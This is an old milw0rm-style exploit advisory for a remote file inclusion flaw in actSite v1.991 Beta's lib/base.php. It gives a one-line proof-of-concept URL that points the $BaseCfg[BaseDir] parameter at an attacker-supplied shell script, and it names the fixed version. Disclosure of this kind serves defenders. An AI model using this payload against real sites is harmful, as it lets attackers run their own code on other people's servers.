\#'#/
(-.-)
---------------------oOO---(_)---OOo--------------------
| actSite v1.991 Beta (base.php) Remote File Inclusion |
| coded by DNX |
--------------------------------------------------------
[!] Discovered: DNX
[!] Vendor: http://www.actsite.de
[!] Detected: 02.09.2007
[!] Reported: 02.09.2007
[!] Remote: yes
[!] Background: actSite is a content management system based on PHP and MySQL
[!] Bug: $BaseCfg[BaseDir] in lib/base.php
[!] PoC:
- http://[site]/[path]/lib/base.php?BaseCfg[BaseDir]=[shell]
[!] Solution: Install update to v1.995
# milw0rm.com [2007-10-01]
